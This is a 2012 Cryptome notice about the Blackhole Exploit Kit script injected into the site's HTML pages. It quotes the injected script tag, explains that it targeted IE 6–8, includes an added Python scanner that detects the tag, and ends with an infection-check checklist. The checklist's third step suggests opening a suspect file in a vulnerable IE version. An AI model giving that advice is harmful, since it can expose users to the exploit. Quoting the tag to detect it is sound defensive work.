
20 February 2012

Report the Blackhole Infection on a Computer


A sends:

"I've read that you've recently been infected with the Blackhole Toolkit. I do not know what this means other than I have recently visited your site within that time frame (Feb. 8 - Feb. 12) with no "protection". Am I infected? What are the signs if I'm infected? Does visiting your site in that time period and your viewing it in IE7 mean you are now infected?"

The Blackhole Exploit infection derived from Cryptome has been confirmed only by the initial report to Cryptome from a reader whose Norton security program reported the Blackhole Exploit program on a particular file.

Since that initial report there have been no reports to Cryptome, nor elsewhere as far as we know, that a computer has been infected by the Blackhole Exploit derived from a Cryptome file.

However, based on comments to Cryptome from security experts:

If an HTML file on Cryptome other than the home page (updated frequently) was accessed during the period, the file most likely contained the Blackhole Exploit script at the end of the underlying HTML code:

<SCRIPT src="/0002/afg/afg.php"></SCRIPT>

If the file was accessed with Microsoft Internet Explorer versions 6.0, 7.0 or 8.0, the script recorded the browser's origin IP address to a sub-directory for covert retrieval by the attacker, and was likely used to infect those computers.

If you retained a Cryptome file from that period, examine the underlying code of the file for the script line at the end of the code. (An HTML file can be opened with a text editor if you do not have an HTML editor.)

If the script line is present in the underlying code, your computer may have been infected with the Blackhole Exploit program, although this is not yet confirmed.
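The check described above can be done in bulk with the following Python script. It is an added example, not code from Cryptome or from the original notice: it parses each saved HTML file, collects every script tag with a src attribute, and reports the line number of any whose src contains the indicator path /0002/afg/afg.php quoted above, regardless of tag case, quoting or surrounding whitespace. It goes slightly beyond the notice by walking whole directories of saved pages; the SAMPLE_HTML input is constructed for illustration.

```python
#!/usr/bin/env python3
"""Scan saved HTML files for the injected script tag quoted in the notice."""
import sys
from html.parser import HTMLParser
from pathlib import Path

# Indicator taken from the notice: the src path of the injected script tag.
INDICATOR_SRC = "/0002/afg/afg.php"

# Constructed sample: a normal page with the injected tag appended after </html>.
SAMPLE_HTML = ('<html><body><p>text</p></body></html>\n'
               '<SCRIPT src="/0002/afg/afg.php"></SCRIPT>\n')


class ScriptCollector(HTMLParser):
    """Record every <script src=...> together with the line it starts on."""

    def __init__(self):
        super().__init__()
        self.scripts = []  # list of (line_number, src)

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src is not None:
            line, _offset = self.getpos()  # position of the tag's '<'
            self.scripts.append((line, src))


def find_injected_scripts(html_text):
    """Return (line, src) for each script tag whose src carries the indicator."""
    parser = ScriptCollector()
    parser.feed(html_text)
    parser.close()
    return [(line, src) for line, src in parser.scripts
            if INDICATOR_SRC.lower() in src.lower()]


def scan_paths(paths):
    """Scan .htm/.html files (or directories of them); return {path: hits}."""
    results = {}
    for root in paths:
        files = [root] if root.is_file() else sorted(root.rglob("*.htm*"))
        for f in files:
            hits = find_injected_scripts(f.read_text("utf-8", errors="replace"))
            if hits:
                results[str(f)] = hits
    return results


if __name__ == "__main__":
    targets = [Path(p) for p in sys.argv[1:]] or []
    for path, hits in scan_paths(targets).items():
        for line, src in hits:
            print(f"{path}: line {line}: <script src={src!r}>")
```

Run it as `python3 scan.py saved_page.html` or pass a directory of retained pages; a file with no output contains no script tag pointing at the indicator path.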

To check on Blackhole Exploit infection:

1. Run a good security protection program on your computer.

2. If the downloaded Cryptome file was retained scan the file with the security protection program.

3. Open the file in an IE 6, 7 or 8 browser to see if an infection is reported.

If the Blackhole Exploit is reported to be on your computer or in the file please let us know, with a screenshot of the report if possible: cryptome[at]earthlink.net